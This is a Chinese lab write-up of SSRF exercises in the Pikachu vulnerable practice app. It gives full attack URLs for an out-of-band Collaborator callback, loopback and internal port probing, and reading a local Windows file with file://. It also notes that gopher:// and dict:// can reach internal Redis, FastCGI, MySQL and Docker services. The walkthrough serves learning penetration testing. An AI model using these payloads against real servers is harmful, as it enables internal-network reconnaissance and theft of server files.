首页
/
行业洞察
/
正文
INDUSTRY INSIGHT · 深度
学习渗透测试——SSRF
📅 2026/10/2 20:57:48
✍️ 爱科研究院
👁 阅读 3,247
学习SSRFSSRF服务端请求伪造服务器提供了从远程拉取资源的功能比如图片预览、URL转码、爬虫、获取网页摘要等但又没有对目标地址做严格过滤与限制攻击者传入恶意URL让服务器去访问这个地址很多内网服务默认信任本机访问服务器作为请求发起者可以访问服务器所在内网总结骗服务器干活拿服务器当跳板扫内网。SSRFcurl只有一个可以点击的链接没有任何输入框或选择看一下提示提示要我了解一下curl相关函数用法。·PHP中curl是用来在服务端发起HTTP请求的扩展·curl支持多种协议包括http/https、gopher、dict、file、ftpgopher协议在其中威胁最大能发送任意TCP数据俗称“万能协议”。学习地址https://zhuanlan.zhihu.com/p/2046951452132881344?utm_mediumopenapi_platformutm_sourcee10c3ad29e50接下来开始读诗http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info1.php判断SSRF存在用burp的Collaborator模块获取一个域名kk8wap9xz661r8u37fhaicecu30uomcb.oastify.com尝试让这个ssrf网站访问域名http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlkk8wap9xz661r8u37fhaicecu30uomcb.oastify.com访问成功按Poll now按键后获取到访问请求。证明这里存在SSRF漏洞访问回环地址网页http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://127.0.0.1端口探测http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://127.0.0.1:3306显示了我的MySQL的版本信息和乱码。内网端口探测成功。读取文件试试file协议http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlfile:///C:/Windows/win.ini显示了我的win.ini文件内容。读取服务器本地文件。SSRFfile_get_content提示要我了解一下file_get_content()相关函数用法。·file_get_content要代码中写了“allow_url_fopen On”才能访问网络URL·file_get_content支持的协议比较少了包括http/https、file、ftp依旧是叫我读诗注意到此时URL结构http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info2.php可以在file...这里做文章访问回环地址网页http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1端口探测http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1:3306探测失败了解后才明白因为3306端口MySQL不认识HTTP请求所以页面会空白http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1:8080探测8080端口时就回显了我的8080端口刚好是BurpSuite在占用读取文件由于file_get_contents支持file://协议尝试读取文件http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filefile:///C:/Windows/win.inigopher:// 协议打内网对比·http只能发 HTTP 请求·gopher他的本质是隧道能发送任意 TCP 报文所以Redis、FastCGI快速通用网关接口默认配置在9000端口、Mysql3306、Memcached缓存系统11211端口、Zabbix Agent监控平台10050端口、Docker APIDocker Daemon监听在2375端口都可以打dict://dict协议只能发文本命令并且会自动补充\r\n可以打redis、简单TCP服务探测内网
📌 标签:
工业官网
设计趋势
AI 建站
SEO
获取完整报告 →
RELATED ARTICLES
推荐阅读
2026/10/2 20:57:48
LSTM光伏功率预测实战:数据清洗、特征工程与PyTorch实现
2026/10/2 20:57:48
PyTorch胶囊网络实战:从零实现动态路由与空间关系建模
2026/10/2 20:52:48
绝区零一条龙:卦象集录每日占卜界面的画面建模与 OCR 自动化实现
2026/10/2 21:48:21
C#调用FFmpeg实现视频水印与分辨率处理实战指南
2026/10/2 21:48:21
游戏如何成为AI训练场:强化学习、仿真环境与奖励信号解析
2026/10/2 21:48:21
Kafka实战指南:从集群部署到参数调优,打造弹性数据处理平台
2026/10/2 21:48:21
基于Node.js与React的AI Agent实战:paperclip核心循环与部署指南
2026/10/2 21:48:20
SpringBoot学生选课系统毕设全攻略:从表设计到并发控制
2026/10/2 21:43:20
AutoRef:多参考图生成的智能调度框架与Harness工程实践
2026/10/2 0:01:33
Jev模型详解:从本地部署到Codex接入与数据系统构建
2026/10/2 0:01:33
Paperclip:轻量级AI Agent编排中间件实战指南
2026/10/2 0:01:33
DeepSpeed ZeRO-3 与 MoE 训练实战:显存优化与通信调优
2026/10/1 22:21:25
网站建设的英语怎么说?别只背单词,看完这套安全完整流程才敢上线
2026/10/2 12:21:42
新手入门看这篇:建设网站加盟避坑指南与SEO实操
2026/10/1 21:38:34
论文AIGC疑似度是什么意思?想查论文AI率有哪些免费工具?
2026/10/2 12:19:13
我发现了一个新思路:用 Remotion + Claude Code 像写代码一样自动化生成短视频
2026/10/2 4:07:50
Windows下 Codex 中 Chrome 和 Computer Use 插件不可用问题排查及解决参考方式:TaoToken 统一 Key 配置与验证
2026/10/2 6:07:10
2026 大模型集体涨价:用 Python 做企业 Token 成本测算与选型避坑(附配置)